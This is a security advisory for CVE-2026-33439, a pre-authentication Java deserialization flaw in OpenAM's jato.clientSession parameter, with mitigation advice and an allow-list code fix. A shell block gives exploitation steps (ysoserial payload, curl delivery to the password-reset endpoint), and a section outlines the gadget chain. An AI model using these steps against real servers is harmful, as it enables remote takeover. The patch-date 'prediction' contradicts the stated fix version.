OpenAM, Deserialization of Untrusted Data (CWE-502), CVE-2026-33439 (CRITICAL) -DC-Jun2026-624


CVE-2026-33439 is a critical vulnerability in OpenIdentityPlatform OpenAM, an open-source access management solution. The flaw resides in the JATO (Java Application Toolkit) framework, specifically within the deserialization of the `jato.clientSession` HTTP parameter. This parameter is processed without any class filtering, allowing an unauthenticated attacker to send a crafted serialized Java object to achieve Remote Code Execution (RCE) on the server.
The vulnerability arises from an incomplete patch for a previous issue, CVE-2021-35464. That earlier fix introduced a `WhitelistObjectInputStream` to restrict deserialization of the `jato.pageSession` parameter to a set of safe classes. However, a second deserialization entry point, `jato.clientSession`, was overlooked and left unprotected. This parameter is handled by `ClientSession.deserializeAttributes()`, which calls `Encoder.deserialize()` and then `ApplicationObjectInputStream.readObject()` with no class whitelist at all.
Exploitation is possible on any JATO ViewBean endpoint whose JSP contains `` tags, such as the Password Reset pages. The deserialization is triggered during JSP rendering, making the attack pre-authentication and remotely executable over the network.
The vulnerability affects OpenAM Community Edition versions up to and including 16.0.5 and is fixed in version 16.0.6 and later. The CVSS v3.1 score for this vulnerability is 9.8 (Critical), indicating its severe impact on confidentiality, integrity, and availability. Public Proof-of-Concept (PoC) and exploit code are already available, significantly increasing the risk of in-the-wild exploitation.

DailyCVE Form:

Platform: OpenAM
Version: <= 16.0.5
Vulnerability: Pre-auth RCE via Deserialization
Severity: Critical (CVSS 9.8)
Date: 2026-04-07

Prediction: Patch expected by 2026-04-15

What Undercode Say

```shell
# Check OpenAM version
curl -s http://target:8080/openam/version | grep "Version"
# Test for vulnerability by sending a benign serialized object
curl -X GET "http://target:8080/openam/ui/PWResetUserValidation?jato.clientSession=test"
# If the server returns an error or processes the parameter, it may be vulnerable
# Use ysoserial to generate a payload for CommonsCollections or other gadgets
java -jar ysoserial.jar CommonsCollections6 "touch /tmp/pwned" | base64 | tr -d '\n'
# Send the payload (example with URL encoding)
curl -X GET "http://target:8080/openam/ui/PWResetUserValidation?jato.clientSession=$(cat payload.b64 | jq -sRr @uri)"
```

Code Snippet (Vulnerable Code Path):

```java
// File: com/iplanet/jato/ClientSession.java
protected ClientSession(RequestContext context) {
    this.encodedSessionString = context.getRequest().getParameter("jato.clientSession");
}

protected void deserializeAttributes() {
    if (this.encodedSessionString != null && this.encodedSessionString.trim().length() > 0) {
        // No class whitelist here: Encoder.deserialize() hands the attacker-controlled
        // bytes straight to ApplicationObjectInputStream.readObject()
        this.setAttributes((Map) Encoder.deserialize(Encoder.decodeHttp64(this.encodedSessionString), false));
    }
}
```

Source: OpenAM Security Advisory

Exploit

The exploit leverages a gadget chain using classes bundled in the OpenAM WAR file. A typical chain is:

1. `PriorityQueue.readObject()` (JDK) triggers heapify and comparison.

2. `Column$ColumnComparator.compare()` (openam-core-16.0.5.jar) calls `Column.getProperty()`.

3. `PropertyUtils.getObjectPropertyValue()` (openam-core-16.0.5.jar) invokes `Method.invoke()` on a `TemplatesImpl` object.

4. `TemplatesImpl.getOutputProperties()` (xalan-2.7.3.jar) calls `newTransformer()` → `defineTransletClasses()`.

5. `TransletClassLoader.defineClass()` loads the attacker’s bytecode.

6. `_class[_transletIndex].newInstance()` instantiates the malicious class, executing `Runtime.getRuntime().exec(cmd)`.

An unauthenticated attacker can send a crafted serialized object as the `jato.clientSession` GET/POST parameter to any vulnerable endpoint (e.g., /openam/ui/PWResetUserValidation).

Protection

1. Upgrade: Immediately upgrade to OpenAM version 16.0.6 or later. This version contains the fix for the vulnerability.

2. Workaround (if upgrading is not immediately possible):

  • Implement a Web Application Firewall (WAF) rule to block HTTP requests containing the `jato.clientSession` parameter.
  • Restrict network access to the OpenAM administrative and user-facing interfaces to only trusted sources.

3. Code-Level Fix (for custom deployments):

  • Apply the same `WhitelistObjectInputStream` logic used for `jato.pageSession` to the `jato.clientSession` deserialization path.
  • Ensure that any deserialization of user-controlled data uses a strict class whitelist.
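As an added example (not OpenAM's own `WhitelistObjectInputStream`, whose source is not reproduced on this page), the following standalone Java class shows the shape of such a code-level fix: an `ObjectInputStream` subclass whose `resolveClass()` refuses any class descriptor that is not on an explicit allow-list, wrapped in a hypothetical `deserializeClientSession()` that stands in for the `Encoder.deserialize()` call in the vulnerable path. The allow-list contents, the class and method names, and the `main()` demonstration are assumptions for illustration; a real deployment would list exactly the attribute types JATO actually stores in the client session.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.PriorityQueue;
import java.util.Set;

/**
 * Hypothetical allow-list ObjectInputStream (added example, not OpenAM code).
 * Only the classes named in ALLOWED (plus primitive arrays and arrays of
 * allowed classes) may be resolved. Everything else is rejected while the
 * class descriptor is being read, i.e. before any constructor, readObject()
 * or comparator of an attacker-chosen class can execute.
 */
public class AllowListObjectInputStream extends ObjectInputStream {

    // Assumed allow-list: the attribute map and the scalar types it is expected to hold.
    private static final Set<String> ALLOWED = Set.of(
        "java.util.HashMap",
        "java.lang.String",
        "java.lang.Integer",
        "java.lang.Long",
        "java.lang.Boolean",
        "java.lang.Number"
    );

    public AllowListObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        String name = desc.getName();
        // Array descriptors look like "[I" (primitive) or "[Ljava.lang.String;".
        // Unwrap them so arrays of allowed classes and of primitives pass the check.
        String base = name;
        while (base.startsWith("[")) {
            base = base.substring(1);
        }
        boolean primitiveArray = !name.equals(base) && base.length() == 1;
        if (base.startsWith("L") && base.endsWith(";")) {
            base = base.substring(1, base.length() - 1);
        }
        if (primitiveArray || ALLOWED.contains(base)) {
            return super.resolveClass(desc);
        }
        throw new InvalidClassException(name, "class is not on the deserialization allow-list");
    }

    /**
     * Hypothetical safe counterpart of ClientSession.deserializeAttributes():
     * takes the already Http64-decoded bytes and only ever returns a Map.
     */
    public static Map<?, ?> deserializeClientSession(byte[] raw)
            throws IOException, ClassNotFoundException {
        try (AllowListObjectInputStream ois =
                 new AllowListObjectInputStream(new ByteArrayInputStream(raw))) {
            return (Map<?, ?>) ois.readObject();
        }
    }

    // Helper used only by the demonstration below to build constructed sample streams.
    private static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // A legitimate client-session attribute map (constructed sample) is accepted.
        Map<String, String> attrs = new HashMap<>();
        attrs.put("locale", "en_US");
        System.out.println("accepted: " + deserializeClientSession(serialize(attrs)));

        // PriorityQueue is the JDK entry point of the gadget chain described above.
        // Its class descriptor alone is enough for the allow-list to refuse the stream,
        // so PriorityQueue.readObject() and the comparator chain never run.
        byte[] queueStream = serialize(new PriorityQueue<>(List.of("x")));
        try {
            deserializeClientSession(queueStream);
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same check must sit on every deserialization entry point, which is exactly what the incomplete CVE-2021-35464 fix missed: protecting `jato.pageSession` alone left `jato.clientSession` open. On JDK 9 and later the equivalent can also be expressed without subclassing, via `ObjectInputStream.setObjectInputFilter()` or a process-wide `jdk.serialFilter` pattern, which additionally lets you cap stream depth and array sizes.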

Impact

  • Pre-Authentication Exploitation: An attacker can compromise the server without needing any credentials.
  • Remote Code Execution (RCE): Successful exploitation allows the attacker to execute arbitrary commands on the server with the privileges of the application server user.
  • Full System Compromise: Given the server’s privileges, this can lead to a complete takeover of the OpenAM server, including data theft, service disruption, and lateral movement within the network.
  • Widespread Exposure: Public PoC and exploit code are available, making the vulnerability highly attractive for both targeted and mass exploitation.


Sources:

Reported By: github.com